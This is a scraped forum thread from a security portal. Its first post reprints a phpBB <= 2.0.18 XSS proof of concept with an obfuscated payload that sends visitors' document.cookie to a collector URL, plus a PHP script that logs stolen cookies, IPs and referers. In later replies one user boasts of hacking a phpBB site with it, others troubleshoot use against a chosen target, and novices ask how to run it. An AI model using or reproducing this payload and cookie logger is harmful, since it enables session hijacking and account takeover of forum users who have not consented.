| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 194 
  Members: 0 
  Total: 194 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | 2.0.18 Proof |  |  
	| 
	
		|  Posted: Fri Dec 23, 2005 12:20 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| syntax9 |  | Active user |  |  
  |  |  |  | Joined: Dec 21, 2005 |  | Posts: 33 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Topic : phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept 
 ExploitAlert Id : 193
 
 Credit : jet
 
 Date : 22.12.2005
 
 Exploit Code :
 
 # SecurityReason Source :
 # http://securityreason.com/achievement_securityalert/29
 # More : http://securityreason.com/achievement
 /******************************************************************
 
 phpBB <= 2.0.18 XSS Cookie Disclosure Proof of Concept
 -- 'the html is on exploit'
 
 original exploit by: Maksymilian Arciemowicz (cXIb8O3) - 12/16/2005
 -- http://securityreason.com/securityalert/269/
 proof of concept by: jet
 -- http://jet.carbon-4.net/
 
 develop a pure, lucid mind, not
 depending upon sound, flavor,
 touch, odor, or any quality.
 - the diamond sutra
 
 ******************************************************************/
 
 phpbb code:
 
 <B C=">" ''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));
 'sss=`i=new/**/Image();i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.s
 ss=null`style='font-size:0; X="<B ">'</B>
 
 c.php:
 
 <?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
 
 ?>
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Fri Dec 23, 2005 12:22 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| syntax9 |  | Active user |  |  
  |  |  |  | Joined: Dec 21, 2005 |  | Posts: 33 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I can not get it to work myself on 1 site did not try others. If someone does let me know. |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Fri Dec 23, 2005 9:42 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| super |  | Active user |  |  
  |  |  |  | Joined: Sep 19, 2005 |  | Posts: 30 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| its working nicely  one phpBB 2.0.18 site hacked buy me for using this exploit  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Dec 24, 2005 8:45 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| syntax9 |  | Active user |  |  
  |  |  |  | Joined: Dec 21, 2005 |  | Posts: 33 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| finally got this to work on the site i wanted it to. but only pulled my cookie. suggestions? |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Dec 31, 2005 1:16 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| WaterBird |  | Active user |  |  
  |  |  |  | Joined: May 16, 2005 |  | Posts: 37 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | syntax9 wrote: |  	  | finally got this to work on the site i wanted it to. but only pulled my cookie. suggestions? | 
 
 I think forum you wan't to sploit don't have the html tags enabled.
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jan 05, 2006 5:16 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| chuan |  | Regular user |  |  
  |  |  |  | Joined: Jan 05, 2006 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| newbie here.can teach me how to go about it?  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sat Jan 07, 2006 10:25 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| rohit507 |  | Beginner |  |  
  |  |  |  | Joined: Dec 22, 2005 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I am a true PHP newb but i have beeen reading up a little, neway how would i write a cookie.php which will allow me to log multiple cookies and not over write the ones previously logged |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Jan 08, 2006 12:45 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| syntax9 |  | Active user |  |  
  |  |  |  | Joined: Dec 21, 2005 |  | Posts: 33 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | Code: |  	  | $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 | 
 
 
 opens the file,
 then writes to the files.
 
 does not produce a new file, just edits the exisiting.
 be sure to CHMOD the File 777 so the "target forum" can open and write to it.
 
 GL
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Sun Jan 08, 2006 4:19 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| chuan |  | Regular user |  |  
  |  |  |  | Joined: Jan 05, 2006 |  | Posts: 7 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | syntax9 wrote: |  	  |  	  | Code: |  	  | $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 | 
 
 
 opens the file,
 then writes to the files.
 
 does not produce a new file, just edits the exisiting.
 be sure to CHMOD the File 777 so the "target forum" can open and write to it.
 
 GL
 | 
 
 ??
 where to start?can elaborate?
 |  |  
		|  |  |  
	|  |  
	| www.waraxe.us Forum Index -> PhpBB 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |